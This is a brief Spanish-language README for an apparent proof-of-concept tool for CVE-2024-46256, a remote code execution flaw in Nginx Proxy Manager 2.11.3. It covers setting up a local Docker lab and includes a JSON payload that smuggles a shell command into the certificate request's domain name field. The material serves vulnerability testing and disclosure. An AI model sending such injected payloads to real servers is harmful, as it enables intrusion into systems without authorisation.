
Herramienta CVE-2024-46256
docker-compose up -d
O puede usar el script automático:
python setup_environment.py
URL: http://localhost:81
Realice las pruebas después de completar la configuración inicial.
Inicie sesión con la cuenta de administrador predeterminada (correo electrónico: [email protected] / contraseña: changeme)
Verifique los permisos de acceso a las funciones relacionadas con la emisión de certificados.
CVE ID: CVE-2024-46256
Producto: Nginx Proxy Manager
Versión: 2.11.3
Tipo de vulnerabilidad: Remote Code Execution (RCE)
CVSS: High
El PoC demuestra que un usuario autenticado puede provocar RCE al inyectar plantillas/comandos en el campo de nombre de dominio durante el proceso de solicitud de emisión de certificados (por ejemplo, Let's Encrypt).
Ejemplo de payload (ejemplo conceptual):
{
"domain_names": ["test.com\"||{command}||\\n test.com\""],
"meta": {
"dns_challenge": false,
"letsencrypt_agree": true,
"letsencrypt_email": "[email protected]"
},
"provider": "letsencrypt"
}
OS: Windows 10
Docker: última versión
Nginx Proxy Manager: 2.11.3